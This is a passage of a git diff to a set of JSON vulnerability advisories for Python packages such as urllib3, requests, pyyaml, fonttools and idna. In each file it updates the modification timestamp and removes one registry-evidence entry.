"modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2016-9015.json b/advisories/BREW-vs-preview-CVE-2016-9015.json index 3b653a3b324..84b07e009d4 100644 --- a/advisories/BREW-vs-preview-CVE-2016-9015.json +++ b/advisories/BREW-vs-preview-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2016-9015", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2017-18342.json b/advisories/BREW-vs-preview-CVE-2017-18342.json index f664437d096..be334cb74c1 100644 --- a/advisories/BREW-vs-preview-CVE-2017-18342.json +++ b/advisories/BREW-vs-preview-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2017-18342", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2018-18074.json b/advisories/BREW-vs-preview-CVE-2018-18074.json index c323398c6c8..2f6649a91a7 100644 --- a/advisories/BREW-vs-preview-CVE-2018-18074.json +++ b/advisories/BREW-vs-preview-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2018-18074", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2018-20060.json b/advisories/BREW-vs-preview-CVE-2018-20060.json index 076bba7fb97..070b53f3aa5 100644 --- a/advisories/BREW-vs-preview-CVE-2018-20060.json +++ b/advisories/BREW-vs-preview-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2018-20060", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2018-25091.json b/advisories/BREW-vs-preview-CVE-2018-25091.json index 0636bffc4c1..6e859b5d6be 100644 --- a/advisories/BREW-vs-preview-CVE-2018-25091.json +++ b/advisories/BREW-vs-preview-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2018-25091", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2019-11236.json b/advisories/BREW-vs-preview-CVE-2019-11236.json index 515a280cb47..d0cac0cb3f6 100644 --- a/advisories/BREW-vs-preview-CVE-2019-11236.json +++ b/advisories/BREW-vs-preview-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2019-11236", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2019-11324.json b/advisories/BREW-vs-preview-CVE-2019-11324.json index 94049f66c66..3669f667da0 100644 --- a/advisories/BREW-vs-preview-CVE-2019-11324.json +++ b/advisories/BREW-vs-preview-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2019-11324", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2019-20477.json b/advisories/BREW-vs-preview-CVE-2019-20477.json index 33ae61da223..555153aaa43 100644 --- a/advisories/BREW-vs-preview-CVE-2019-20477.json +++ b/advisories/BREW-vs-preview-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2019-20477", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2020-14343.json b/advisories/BREW-vs-preview-CVE-2020-14343.json index 77bc2116e84..dd90fa72cd9 100644 --- a/advisories/BREW-vs-preview-CVE-2020-14343.json +++ b/advisories/BREW-vs-preview-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2020-14343", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2020-1747.json b/advisories/BREW-vs-preview-CVE-2020-1747.json index cfb66103180..f1986d5cffc 100644 --- a/advisories/BREW-vs-preview-CVE-2020-1747.json +++ b/advisories/BREW-vs-preview-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2020-1747", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2020-26137.json b/advisories/BREW-vs-preview-CVE-2020-26137.json index ae66b71d590..98abb76ab8d 100644 --- a/advisories/BREW-vs-preview-CVE-2020-26137.json +++ b/advisories/BREW-vs-preview-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2020-26137", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2020-7212.json b/advisories/BREW-vs-preview-CVE-2020-7212.json index d36998f6701..1d4d636fdc5 100644 --- a/advisories/BREW-vs-preview-CVE-2020-7212.json +++ b/advisories/BREW-vs-preview-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2020-7212", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2021-28363.json b/advisories/BREW-vs-preview-CVE-2021-28363.json index a0715d0095a..638eea3e4db 100644 --- a/advisories/BREW-vs-preview-CVE-2021-28363.json +++ b/advisories/BREW-vs-preview-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2021-28363", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2021-33503.json b/advisories/BREW-vs-preview-CVE-2021-33503.json index 8a3cf1df946..2d00c65a0fd 100644 --- a/advisories/BREW-vs-preview-CVE-2021-33503.json +++ b/advisories/BREW-vs-preview-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2021-33503", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2023-32681.json b/advisories/BREW-vs-preview-CVE-2023-32681.json index 6738ffb7b71..e7f0cada2ef 100644 --- a/advisories/BREW-vs-preview-CVE-2023-32681.json +++ b/advisories/BREW-vs-preview-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2023-32681", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2023-43804.json b/advisories/BREW-vs-preview-CVE-2023-43804.json index b0347f6ffb8..942353ab26e 100644 --- a/advisories/BREW-vs-preview-CVE-2023-43804.json +++ b/advisories/BREW-vs-preview-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2023-43804", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2023-45139.json b/advisories/BREW-vs-preview-CVE-2023-45139.json index f6bb831ff1e..6fc35b9024b 100644 --- a/advisories/BREW-vs-preview-CVE-2023-45139.json +++ b/advisories/BREW-vs-preview-CVE-2023-45139.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2023-45139", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-6673-4983-2vx5", "CVE-2023-45139", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fonttools", - "subject_version": "4.62.1", - "key": "pkg:pypi/fonttools@4.62.1", - "resource": "fonttools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2023-45803.json b/advisories/BREW-vs-preview-CVE-2023-45803.json index 35de7d201ba..b7c0f32877d 100644 --- a/advisories/BREW-vs-preview-CVE-2023-45803.json +++ b/advisories/BREW-vs-preview-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2023-45803", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2024-35195.json b/advisories/BREW-vs-preview-CVE-2024-35195.json index 12acb9a548a..5537acd5880 100644 --- a/advisories/BREW-vs-preview-CVE-2024-35195.json +++ b/advisories/BREW-vs-preview-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2024-35195", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2024-3651.json b/advisories/BREW-vs-preview-CVE-2024-3651.json index de24619b7c1..d1748876276 100644 --- a/advisories/BREW-vs-preview-CVE-2024-3651.json +++ b/advisories/BREW-vs-preview-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2024-3651", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.11", - "key": "pkg:pypi/idna@3.11", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2024-37891.json b/advisories/BREW-vs-preview-CVE-2024-37891.json index b31c57f74c3..a4305c3312f 100644 --- a/advisories/BREW-vs-preview-CVE-2024-37891.json +++ b/advisories/BREW-vs-preview-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2024-37891", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2024-47081.json b/advisories/BREW-vs-preview-CVE-2024-47081.json index dfcd811bf14..80d1e70bd24 100644 --- a/advisories/BREW-vs-preview-CVE-2024-47081.json +++ b/advisories/BREW-vs-preview-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2024-47081", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2025-50181.json b/advisories/BREW-vs-preview-CVE-2025-50181.json index 19763c92524..b2fb15948a0 100644 --- a/advisories/BREW-vs-preview-CVE-2025-50181.json +++ b/advisories/BREW-vs-preview-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2025-50181", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2025-50182.json b/advisories/BREW-vs-preview-CVE-2025-50182.json index a23fef5d81b..3407915e458 100644 --- a/advisories/BREW-vs-preview-CVE-2025-50182.json +++ b/advisories/BREW-vs-preview-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2025-50182", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2025-66034.json b/advisories/BREW-vs-preview-CVE-2025-66034.json index 10319d697cf..57dff4cfe96 100644 --- a/advisories/BREW-vs-preview-CVE-2025-66034.json +++ b/advisories/BREW-vs-preview-CVE-2025-66034.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2025-66034", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-768j-98cg-p3fv", "CVE-2025-66034", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fonttools", - "subject_version": "4.62.1", - "key": "pkg:pypi/fonttools@4.62.1", - "resource": "fonttools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2025-66418.json b/advisories/BREW-vs-preview-CVE-2025-66418.json index ab472e1c054..557373dac24 100644 --- a/advisories/BREW-vs-preview-CVE-2025-66418.json +++ b/advisories/BREW-vs-preview-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2025-66418", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2025-66471.json b/advisories/BREW-vs-preview-CVE-2025-66471.json index b57baa0f708..5ffbadd6577 100644 --- a/advisories/BREW-vs-preview-CVE-2025-66471.json +++ b/advisories/BREW-vs-preview-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2025-66471", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2026-21441.json b/advisories/BREW-vs-preview-CVE-2026-21441.json index cb55994e0a6..4f3aa665fa7 100644 --- a/advisories/BREW-vs-preview-CVE-2026-21441.json +++ b/advisories/BREW-vs-preview-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2026-21441", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2026-25645.json b/advisories/BREW-vs-preview-CVE-2026-25645.json index 0646ecf9718..24bcfb8413d 100644 --- a/advisories/BREW-vs-preview-CVE-2026-25645.json +++ b/advisories/BREW-vs-preview-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2026-25645", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.32.5", - "key": "pkg:pypi/requests@2.32.5", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2026-44431.json b/advisories/BREW-vs-preview-CVE-2026-44431.json index 60e61d62957..bf186b16d53 100644 --- a/advisories/BREW-vs-preview-CVE-2026-44431.json +++ b/advisories/BREW-vs-preview-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2026-44431", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2026-44432.json b/advisories/BREW-vs-preview-CVE-2026-44432.json index 7e428971ed7..f7c1897ff49 100644 --- a/advisories/BREW-vs-preview-CVE-2026-44432.json +++ b/advisories/BREW-vs-preview-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2026-44432", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.6.3", - "key": "pkg:pypi/urllib3@2.6.3", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-vs-preview-CVE-2026-45409.json b/advisories/BREW-vs-preview-CVE-2026-45409.json index 30958aa4e77..b24faef421e 100644 --- a/advisories/BREW-vs-preview-CVE-2026-45409.json +++ b/advisories/BREW-vs-preview-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vs-preview-CVE-2026-45409", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:25Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.11", - "key": "pkg:pypi/idna@3.11", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI",